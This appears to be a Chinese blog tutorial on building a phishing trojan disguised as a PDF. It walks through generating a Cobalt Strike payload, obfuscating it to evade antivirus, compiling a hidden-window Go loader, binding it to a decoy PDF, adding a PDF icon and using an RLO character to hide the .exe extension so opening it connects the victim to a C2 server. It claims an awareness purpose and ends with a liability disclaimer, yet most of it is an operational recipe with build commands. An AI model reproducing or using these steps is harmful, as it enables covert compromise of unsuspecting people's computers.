本文章主要实现的功能是：用户点击伪装的PDF文件，然后受害主机上线到C2服务器。

通过了解一些攻击者是如何进行伪装进行钓鱼，来提高大家一定的防范意识。

本文涉及的工具和测试文件可通过文章末尾的附件 ByPass.zip 下载。

1.使用CS生成可以上线的Python Payload

2.使用bypassAV生成免杀后的代码

bypassAV项目地址：https://github.com/pureqh/bypassAV

(1)将payload.py中的buf的内容，填充至go_shellcode_encode.py中的变量shellcode处，运行脚本后，生成混淆后的base64 payload。

先升级pip：
python.exe -m pip install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple
再安装numpy模块：
pip install numpy -i https://pypi.tuna.tsinghua.edu.cn/simple
运行go_shellcode_encode.py：
python .\go_shellcode_encode.py

脚本运行结果：

(2)将生成的base64 payload填至main.go中的build("payload")处。

(3)将main.go中的url替换为某个网页（可以正常访问的页面即可）

(4)编译程序。

go build -trimpath -ldflags="-w -s -H=windowsgui" main.go

3.使用GoFileBinder把exe捆绑个pdf文件

GoFileBinder项目地址：https://github.com/inspiringz/GoFileBinder?ref=golangexample.com

将使用bypassAV生成的免杀后的main.exe复制到GoFileBinder目录下。

先编译生成GoFileBinder主程序。

PS C:\Users\Blue\Desktop\ByPass\GoFileBinder> go build GoFileBinder.go
PS C:\Users\Blue\Desktop\ByPass\GoFileBinder> .\GoFileBinder.exe

╔═╗┌─┐╔═╗┬┬  ┌─┐╔╗ ┬┌┐┌┌┬┐┌─┐┬─┐
║ ╦│ │╠╣ ││  ├┤ ╠╩╗││││ ││├┤ ├┬┘
╚═╝└─┘╚  ┴┴─┘└─┘╚═╝┴┘└┘─┴┘└─┘┴└─
https://github.com/inspiringz/GoFileBinder

Usage:
    C:\Users\Blue\Desktop\ByPass\GoFileBinder\GoFileBinder.exe <evil_program> <bind_file> [x64/x86]

将免杀程序main.exe与测试pdfAl.pdf使用GoFileBinder进行捆绑。

.\GoFileBinder.exe main.exe Al.pdf x64

注意：main.exe和Al.pdf前面不要加表示当前目录的"./"，加的话会导致编译失败。

现在我们得到了捆绑pdf后的免杀exe文件(AL.exe)。

4.给免杀的捆绑exe设置个图标(pdf缩略图效果)

现在的话，免杀的捆绑AL.exe文件还是没有任何图标的，比较原始，隐蔽性不高。

(1)打开测试的pdf文档(Al.pdf)截个图生成1.png文件。

(2)使用pngZico将png图片转为ico图片

(3)使用ico替换工具将免杀的捆绑AL.exe文件换图标为刚刚提取的1.ico。

这样，我们就获得了有图标的免杀的捆绑AL.exe文件。

这样的话，迷惑性就大很多了。

5.使用RLO改个后缀(名称中不建议有中文)

做戏尽量要做全套。我们再改下文件名，尽量使exe后缀看起来没那么明显。

首先，我们先打开个记事本，然后输入字符Al。

接着，右键选择"插入Unicode控制字符"，再选择"RLO"模式。

接着，只看着键盘输入fdp.exe。下面就是拼接后的效果。

我们使用Ctrl+A全选这段字符串进行复制。接着选中有图标的免杀的捆绑AL.exe文件，选择重命名，然后全选文件名AL.exe，接着选择"粘贴"。效果如下：

这样的话，看起来就像样的多了。

当我们运行这个文件，可以看到我们能正常打开测试的Pdf文件，同时，我们也能直接上线这台电脑。

当然，我们也可以尝试用别的方法将捆绑的文件改为png或jpg等图片文件，然后最后实现的效果就是打开一个正常图片的同时上线该主机。

大家可以在VT上测试下，通过该方法实现的免杀效果还是不错的。

<font color="#dd0000"> 特别声明：
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者的允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。切勿用于非法，仅供学习参考。 </font>